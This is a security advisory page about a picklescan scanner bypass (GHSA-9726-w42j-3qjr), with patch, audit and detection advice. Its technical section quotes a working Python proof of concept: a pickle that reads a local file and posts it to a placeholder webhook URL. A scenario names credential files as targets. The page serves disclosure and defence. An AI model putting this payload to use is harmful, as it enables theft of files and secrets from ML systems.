AI Threat Alert AI Threat Alert

GHSA-9726-w42j-3qjr: picklescan: Path Traversal enables file access

GHSA-9726-w42j-3qjr HIGH
Published January 8, 2026
CISO Take

picklescan is used as a security gate in ML pipelines to validate pickle files before loading — this vulnerability means that gate is bypassable, giving your team false confidence that pickle files are clean. Attackers can craft malicious pickles that exfiltrate `/etc/passwd` and other sensitive files via SSRF without triggering RCE-focused blocklists. Upgrade picklescan to 0.0.35 immediately and audit any pickle files scanned by earlier versions as potentially untrusted.

Risk Assessment

HIGH. The severity is amplified because the affected component is a security control itself, not just an application library — bypassing it silently degrades your entire pickle validation posture without raising alarms. Exploit complexity is low: a working PoC is public, requires no authentication, and chains two standard library modules that are unlikely to appear in RCE blocklists. AI/ML environments are uniquely exposed given the ubiquity of pickle for model and dataset serialization across training, fine-tuning, and serving pipelines.

Affected Systems

Package Ecosystem Vulnerable Range Patched
picklescan pip < 0.0.35 0.0.35
401 3 dependents Pushed 2mo ago 95% patched ~12d to patch Full package profile →

Do you use picklescan? You're affected.

Severity & Risk

CVSS 3.1
N/A
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Moderate

Recommended Action

5 steps

  1. PATCH

    Upgrade picklescan to >= 0.0.35 immediately across all environments (pip install --upgrade picklescan).

  2. AUDIT

    Treat all pickle files scanned by picklescan < 0.0.35 as unverified; re-scan with the patched version or reload from trusted sources.

  3. MIGRATE

    Prefer safer serialization formats — safetensors for model weights, Parquet/Arrow for datasets — that eliminate pickle deserialization risk entirely.

  4. NETWORK CONTROLS

    Enforce egress filtering on model-loading workers to block unexpected outbound HTTP/HTTPS, which would mitigate the SSRF exfiltration leg even if a malicious pickle executes.

  5. DETECT

    Alert on outbound HTTP connections from processes performing model loading. Monitor for io.FileIO or urllib.request patterns in pickle scanning logs if running custom detection.

Classification

Supply Chain Data Extraction Data Leakage Framework Training Data Model AML.T0010.001 AML.T0011.000 AML.T0025 AML.T0037 AML.T0107

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity Article 9 - Risk management system
ISO 42001
A.10.1 - AI system security A.8.1 - Suppliers and third parties
NIST AI RMF
MANAGE 2.2 - Mechanisms for AI risk management
OWASP LLM Top 10
LLM03 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is GHSA-9726-w42j-3qjr?

picklescan is used as a security gate in ML pipelines to validate pickle files before loading — this vulnerability means that gate is bypassable, giving your team false confidence that pickle files are clean. Attackers can craft malicious pickles that exfiltrate `/etc/passwd` and other sensitive files via SSRF without triggering RCE-focused blocklists. Upgrade picklescan to 0.0.35 immediately and audit any pickle files scanned by earlier versions as potentially untrusted.

Is GHSA-9726-w42j-3qjr actively exploited?

No confirmed active exploitation of GHSA-9726-w42j-3qjr has been reported, but organizations should still patch proactively.

How to fix GHSA-9726-w42j-3qjr?

1. PATCH: Upgrade picklescan to >= 0.0.35 immediately across all environments (pip install --upgrade picklescan). 2. AUDIT: Treat all pickle files scanned by picklescan < 0.0.35 as unverified; re-scan with the patched version or reload from trusted sources. 3. MIGRATE: Prefer safer serialization formats — safetensors for model weights, Parquet/Arrow for datasets — that eliminate pickle deserialization risk entirely. 4. NETWORK CONTROLS: Enforce egress filtering on model-loading workers to block unexpected outbound HTTP/HTTPS, which would mitigate the SSRF exfiltration leg even if a malicious pickle executes. 5. DETECT: Alert on outbound HTTP connections from processes performing model loading. Monitor for `io.FileIO` or `urllib.request` patterns in pickle scanning logs if running custom detection.

What systems are affected by GHSA-9726-w42j-3qjr?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, MLOps CI/CD pipelines, model registries, data preprocessing pipelines.

What is the CVSS score for GHSA-9726-w42j-3qjr?

No CVSS score has been assigned yet.

Technical Details

NVD Description

### Summary Unsafe pickle deserialization allows unauthenticated attackers to read arbitrary server files and perform SSRF. By chaining io.FileIO and urllib.request.urlopen, an attacker can bypass RCE-focused blocklists to exfiltrate sensitive data (example: /etc/passwd) to an external server. ### Details The application deserializes untrusted pickle data. While RCE keywords (os, exec) may be blocked, the exploit abuses standard library features: 1. io.FileIO: Opens local files without using builtins.open. 2. urllib.request.urlopen: Accepts the file object as an iterable body for a POST request. 3. Data Exfiltration: The file content is streamed directly to an attacker-controlled URL during unpickling. ### PoC ```python import pickle, io, urllib.request class GetFile: def __reduce__(self): return (io.FileIO, ('/etc/hosts', 'r')) class Exfiltrate: def __reduce__(self): return (urllib.request.urlopen, ('https://webhook.site/YOUR_UUID_HERE', GetFile())) with open("bypass_http.pkl", "wb") as f: pickle.dump(Exfiltrate(), f) ``` <img width="650" height="114" alt="Screenshot 2025-12-30 at 10 13 14 PM" src="https://github.com/user-attachments/assets/4edf9640-80f6-4701-ae87-cff1079e2994" /> ### Impact - Arbitrary file read Thanks for this library and your time. If you think `picklescan` is focused on detecting only `RCE` kind of vulnerabilities rather adding `File IO`, `Http` or any protocol based may cause lot of noise, feel free to close this issue.

Exploitation Scenario

An adversary targets an organization's model hub or shared ML artifact repository. They upload a poisoned model checkpoint serialized as a malicious pickle using the PoC technique — chaining `io.FileIO('/etc/passwd', 'r')` as the body of a `urllib.request.urlopen` POST to an attacker-controlled webhook. The organization's CI/CD pipeline runs picklescan (< 0.0.35) on incoming artifacts; the file passes as clean because it contains no `os.system`, `exec`, or other RCE-pattern opcodes. A downstream data scientist or automated pipeline loads the checkpoint into a training job. At deserialization, the server streams its `/etc/passwd` — or more critically, cloud credential files like `~/.aws/credentials` or mounted secrets — directly to the attacker's server, all before any model code executes.

Weaknesses (CWE)

CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Primary CWE-918 Server-Side Request Forgery (SSRF) Primary

References

Timeline

Published
January 8, 2026
Last Modified
January 8, 2026
First Seen
March 24, 2026

Related Vulnerabilities

CRITICAL GHSA-vvpj-8cmc-gx39 10.0

picklescan: security flaw enables exploitation

Same package: picklescan
CRITICAL GHSA-g38g-8gr9-h9xp 9.8

picklescan: Allowlist Bypass evades input filtering

Same package: picklescan
CRITICAL GHSA-7wx9-6375-f5wh 9.8

picklescan: Allowlist Bypass evades input filtering

Same package: picklescan
CRITICAL CVE-2025-1945 9.8

picklescan: ZIP flag bypass enables RCE in PyTorch models

Same package: picklescan
HIGH GHSA-hgrh-qx5j-jfwx 8.8

picklescan: Protection Bypass circumvents security controls

Same package: picklescan
Back to Threat Feed